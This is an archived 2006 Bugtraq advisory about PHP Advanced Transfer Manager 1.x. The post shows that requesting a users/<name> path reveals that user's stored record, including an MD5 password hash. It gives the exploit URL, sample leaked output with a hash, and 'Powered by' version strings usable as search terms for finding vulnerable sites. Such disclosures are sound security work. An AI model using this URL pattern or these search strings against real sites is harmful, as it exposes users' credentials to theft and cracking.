Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

PHP Advanced Transfer Manager Download users password hashes

From: liz0 () bsdmail com
Date: 9 Mar 2006 19:55:55 -0000
PHP Advanced Transfer Manager Download users password hashes 

PHP Advanced Transfer Manager 1.*

Site:http://phpatm.free.fr/
----------------------------------------------------
Bugs:

http://victim.com/path/users/username
----------------------------------------------------
example:

http://www.victim.com/Path/users/Admin


3a23bb515e06d0e944ff916e79a7775c ------>md5
0
victim () victim co za
0
1

1
1026836078
en 


----------------------------------------------------

Vulnerabilities :
"Powered by PHP Advanced Transfer Manager v1.00"
"Powered by PHP Advanced Transfer Manager v1.01"
"Powered by PHP Advanced Transfer Manager v1.02"
"Powered by PHP Advanced Transfer Manager v1.03"
"Powered by PHP Advanced Transfer Manager v1.10"
"Powered by PHP Advanced Transfer Manager v1.22"
"Powered by PHP Advanced Transfer Manager v1.21"
"Powered by PHP Advanced Transfer Manager v1.20"
"Powered by PHP Advanced Transfer Manager v1.30"
-----------------------------------------------------
Credit :Liz0ziM
Website:www.biyosecurity.com
Mail   :liz0 () bsdmail com

------------------------------------------------------

Source:

http://www.blogcu.com/Liz0ziM/316652/
http://biyosecurity.be/bugs/patm.txt
Previous By Date Next
Previous By Thread Next

Current thread: